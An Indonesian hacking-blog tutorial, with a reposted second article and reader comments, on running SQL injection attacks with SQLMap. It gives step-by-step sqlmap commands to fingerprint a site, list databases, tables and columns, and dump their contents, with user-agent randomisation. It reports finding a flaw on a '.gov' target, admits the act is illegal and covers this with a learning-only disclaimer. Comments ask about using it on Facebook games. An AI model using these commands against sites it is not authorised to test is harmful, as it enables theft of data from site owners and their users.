Home / Hacking / Tutorial Pentest & Hacking Dengan SQLMAP
pentest-hacking-sqlmap

Tutorial Pentest & Hacking Dengan SQLMAP

Greeting BinusHacker Family,

Semoga semua dalam keadaan yang baik dan sehat 🙂
Kali ini BinusHacker akan berbagi bagaimana melakukan penetration testing dengan menggunakan SQLMap (Tools SQL Injection & Takeover)

Yang perlu dipersiapkan:
1. Tools SQL MAP
2. PC / Server yang sudah ter-install python
3. Target yang memiliki vulnerability SQL Injection

DOWNLOAD SQLMAP DI LINK BERIKUT


atau

Kelebihan menggunakan SQL Map:
1. Bisa melakukan SQL Injection dengen beberapa method seperti:
– Boolean-Based Blind SQL Injection
– Time-Based Blind SQL Injection
– Error-Based SQL Injection
– UNION Query SQL Injection
– Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
– MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase & SAP MaxDB

Oke langsung praktek saja, kita akan mencoba untuk melakukan “Fingerprinting Database & Kelemahan SQL” pada sebuah website target.

Nah, dari sana kelihatan bahwa target “.gov” tersebut memiliki kelemahan di “boolean-based blind sql injection

Selanjutnya, <<Di sensor, You Know Ya! >> 🙂

Berikut adalah beberapa command penting di SQLMAP

Untuk melakukan scanning terhadap Target [URL]
./sqlmap.py -u[url]

Untuk mendapatkan informasi database Target [URL]
./sqlmap.py -u[url] –dbs

Untuk mendapatkan informasi table di database Target [URL]
./sqlmap.py -u [url] –tables -D [database]

Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]
./sqlmap.py -u [url] –columns -T [table name] -D [databasename]

Untuk melakukan dump kolom, table dan database Target [URL]
./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]

Untuk melakukan dump spesifik kolom Target [URL]
./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]

Tutorial lengkap ada didalam video berikut:

Artikel tentang SQLMAP yang lainnya [By Ari Pratomo]

Hallo brother, kali ini ane ngepost video tutorial tentang sql injection menggunakan sqlmap di backtrack5, silahkan ikuti videonya dengan seksama hingga ahir, pasti anda langsung bisa :)

Sqlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini menurut saya, tools sql injection yang free paling lengkap untuk saat ini, walaupun ada havij, tapi menurut saya havij kurang advanced, havij lebih banyak dipakai oleh newbie newbie, karena memang kegunaan nya yang sangat simple untuk sekali attack sql injection

** Harap menjadi perhatian tindakan ini merupakan ilegal, tindakan ini semata-mata hanya sebagai pembelajaran saja. tutorial ini dibuat hanya untuk tujuan pembelajaran, Kesalahan penggunaan tools ditanggung jawab sepenuhnya oleh pengguna, Saya tidak bertanggung jawab atas tindakan yang akan anda lakukan :)

Detailnya silakan tonton video dibawah:

Biar lengkap saya kasih step-stepnya:

  • Test injeksi dengan men-fetch banner mysql (versi mysql)

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --banner

  • Fetch user yang digunakan, dan db yang sedang digunakan dengan flag (–current-user dan –current-db), langkah ini ialah analisis user yang dipakai di DBMS dan DB yang sedang digunakan pada website tersebut.

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --current-user --current-db

  •   Fetch list database yang bisa dihandle oleh user website-in@localhost dengan flag (–dbs)

Dengan mengetahui list databse yang lain kita dapat bebas melakukan injeksi pada setiap database yang available untuk di injeksi.
./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 --dbs

  • Fetch list tables di database portal dengan flag (-D nama_tabel –tables)

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel --tables

  • Fetch isi kolum pada setiap tables dengan flag (–columns)

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom --columns

  •  Sekarang kita akan men-fetch hanya isi dari kolum dengan flag (-D nama_tabel -T kolom -C isi_kolom1,isi_kolom2 –dump)

./sqlmap.py -u "http://situs_target.com" --random-agent --threads 10 -D nama_tabel  -T nama_kolom -C isi_kolom1,isi_kolom2 --dump

Selamat, anda sukses melakukan SQL Injection & selamat mencoba 🙂

About Artikel

Check Also

hacking-ruby-programming-binushacker

Hacking dan Tuning Ruby Programming

Hacking and Tuning Ruby Programming Hacking Ruby Guidance Daftar Isi Materi Beberapa bab masih dalam …

26 comments

  1. thanks brother, video ane ada disini 🙂

  2. mantaps,,
    gw coba yah…

  3. oiya jangan lupa subcribe

  4. gan , keterangan di atas , yang harus di siapkan salahsatunya pc server yg sdh terinstal python, klo python nya blm terinstal sqlmap nya tetep bisa di gunain or gg y gan?????

  5. @antony
    klo pake backtrack kan siap pake gan, gak perlu siapin pc server, ane cuma pake leptop + VMware

  6. gan, ane belajar instal backtrack 4 iso R2 di windows 7 pakek VMware, trus pas wktu instal proses hampir selesai kan disuruh masukin bt login & password nya ane gk tau, gmn gan?????? tlg ane

  7. username dan password default Backtrack

    username: root
    password: toor

  8. Ijin Share Ilmu di FB…

  9. kak . ubuntu nya ngak ada ?

  10. haha keren bangets hmm gua suka …

  11. nyimak aja,
    belum paham
    mklum newbie.hehehe

  12. izin Sedot yah Mass bro 🙂

  13. klo buat injeksi utk game fb bs gk?

  14. gan cara instal aircrack-ng gimana di backtack

  15. kurang ngerti bro,mgkn klo udh praktek dan otak atik br bs ngerti.

  16. hmmm itu untuk windows kan

  17. masih bingung kk

  18. klo buat xp bisa ga yah ???
    O.o???

  19. makasih gan sambil belajar juga sambil posting di blogg ane ,,

    nannya :

    mungkin gak kalo modem hwawei gw gak support buat sqlinjection pakek sqlmap ,, soalnya gw pakek cara manual bisa, tp kalo pk sqlmap malah gak bisa

    thank’s before

  20. *.php?id=xxx
    itu cara mengetahui xxx_nya dmna gan mohon pencerahannya

  21. Not Work :3 Tetapi Bisa HAhahaa

  22. bang cara mengetahui email yang xxxx di havij gimana??

  23. Sukirman suciman SUGIROH

    Mantep thanks bang, akhir nya ketemu juga cara pake –threads di sqlmap :v
    Request tutor sql manual dong bang sama jenis” query nya :3

  24. Kereeeennnn…..

  25. Brarti bsa jga y gan lw kita hack pakai btrack dri vmware???
    Wajib konek intrnet gk??

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *